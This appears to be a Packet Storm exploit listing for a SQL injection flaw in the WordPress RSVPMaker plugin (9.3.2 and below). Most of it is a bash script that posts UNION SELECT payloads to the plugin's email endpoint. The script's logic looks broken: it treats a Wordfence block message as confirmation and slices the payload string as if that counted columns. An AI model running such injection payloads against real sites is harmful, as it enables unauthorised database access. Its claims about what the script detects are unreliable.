
WordPress RSVPMaker 9.3.2 SQL Injection

WordPress RSVPMaker plugin versions 9.3.2 and below suffer from a remote SQL injection vulnerability.

Packet Storm
#sql #vulnerability #web #wordpress #php

#!/bin/bash
# Set the URL of the website running the vulnerable plugin
url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"
# Set the number of columns in the query
columns=5
response=$(curl -s "$url")
query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')
payload="' UNION SELECT 1,2,3,4,5-- "
# Test the query with different numbers of columns
for i in $(seq 1 $columns)
do
  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"
  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"
  if [ $? -eq 0 ]
  then
    echo "Vulnerability confirmed with $i columns"
    break
  fi
done
